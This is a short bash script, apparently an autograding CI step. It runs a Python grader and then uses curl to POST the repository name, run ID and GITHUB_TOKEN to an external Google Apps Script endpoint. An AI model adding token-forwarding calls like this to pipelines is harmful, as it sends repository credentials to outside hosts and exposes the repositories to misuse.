#!/bin/bash -e
PYTHONPATH=. grader/autograde.py
if [[ -n "$GITHUB_TOKEN" ]]; then
    curl --fail-with-body -sL \
        -H "Content-Type: application/json" \
        -d "{\"repo\":\"$GITHUB_REPOSITORY\",\"token\":\"$GITHUB_TOKEN\",\"run_id\":$GITHUB_RUN_ID}" \
        'https://script.google.com/macros/s/AKfycbxrMYW9MpLs3zK8NCyYLTSS6N9p8gJIStRLYXqDjxd1-e_jQEuytgdXKKKDmQg9847MIw/exec'
fi
